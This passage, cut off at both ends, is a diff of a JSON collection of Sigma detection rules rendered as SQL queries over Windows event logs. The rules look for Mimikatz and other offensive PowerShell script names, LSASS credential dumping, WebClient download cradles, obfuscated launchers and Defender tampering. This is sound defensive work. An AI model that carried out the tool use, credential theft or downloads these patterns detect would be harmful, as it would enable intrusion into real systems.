'\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "MSI Installation From Web", - "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", + "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "status": "experimental", - "description": "Detects installation of a remote msi file from web.", - "author": "Stamatis Chatzimangou", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1218", - "attack.t1218.007" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "win_msi_install_from_web.yml" + "filename": "posh_pm_susp_zip_compress.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Suspicious PowerShell Download - PoshModule", + "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_pm_susp_download.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Alternate PowerShell Hosts - PowerShell Module", + "id": "64e8e417-c19a-475a-8d19-98ea705394cc", + "status": "test", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_pm_alternate_powershell_hosts.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Windows Defender Exclusions Added", - "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "status": "stable", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_defender_exclusions.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "title": "DirectorySearcher Powershell Exploitation", + "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "author": "frack113", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - 